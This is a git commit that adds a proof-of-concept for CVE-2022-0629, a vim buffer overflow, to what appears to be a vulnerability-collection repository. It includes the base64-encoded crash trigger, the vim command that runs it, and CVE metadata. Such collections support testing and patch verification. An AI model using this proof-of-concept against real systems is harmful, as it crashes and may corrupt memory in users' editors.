ADD CVE-2022-0629

2022-10-21 11:12:46 +08:00 · 2022-10-21 11:12:46 +08:00 · ff6b7e4be9
parent fc26373b51
commit ff6b7e4be9
5 changed files with 36 additions and 0 deletions
--- a/cve/vim/2022/CVE-2022-0629/README.md
+++ b/cve/vim/2022/CVE-2022-0629/README.md
@ -0,0 +1,8 @@
+### 漏洞验证
+```shell
+$ echo -ne "bm9ybTEwMGdy3YAKZnUgUigpCmxldCBsaW5lPWdldGxpbmUoMSkKcmV0dSBsaW5lCmVuZGYKCmNh
+bGwgYXNzZXJ0X2VxdWFsKDEsUigpKQo=" | base64 -d > poc
+
+$ vim -u NONE -i NONE -n -X -Z -e -m -s -S poc -c ":qa!"
+```
+![](./png/CVE-2022-0629.png)
--- a/cve/vim/2022/CVE-2022-0629/png/CVE-2022-0629.png
+++ b/cve/vim/2022/CVE-2022-0629/png/CVE-2022-0629.png
--- a/cve/vim/2022/CVE-2022-0629/poc
+++ b/cve/vim/2022/CVE-2022-0629/poc
@ -0,0 +1,7 @@
+norm100gr݀
+fu R()
+let line=getline(1)
+retu line
+endf
+
+call assert_equal(1,R())
--- a/cve/vim/2022/yaml/CVE-2022-0629.yaml
+++ b/cve/vim/2022/yaml/CVE-2022-0629.yaml
@ -0,0 +1,20 @@
+id: CVE-2022-0629
+source: https://huntr.dev/bounties/95e2b0da-e480-4ee8-9324-a93a2ab0a877/
+info:
+  name: Vim是一款基于UNIX平台的编辑器。
+  severity: high
+  description: |
+    vim 存在安全漏洞，该漏洞源于GitHub存储库vim/vim 8.2之前的版本存在缓冲区溢出。
+  scope-of-influence:
+    vim<8.2
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2022-0629
+    - https://github.com/vim/vim/commit/34f8117dec685ace52cd9e578e2729db278163fc
+  classification:
+    cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
+    cvss-score: 7.8
+    cve-id: CVE-2022-0629 
+    cwe-id: CWE-787,CWE-121
+    cnvd-id: None
+    kve-id: None
+  tags: 缓冲区溢出,cve2022
--- a/vulnerability_list.yaml
+++ b/vulnerability_list.yaml
@ -23,5 +23,6 @@ cve:
    - CVE-2021-4034
  vim:
    - CVE-2022-0729
+    - CVE-2022-0629
 cnvd:
 kve: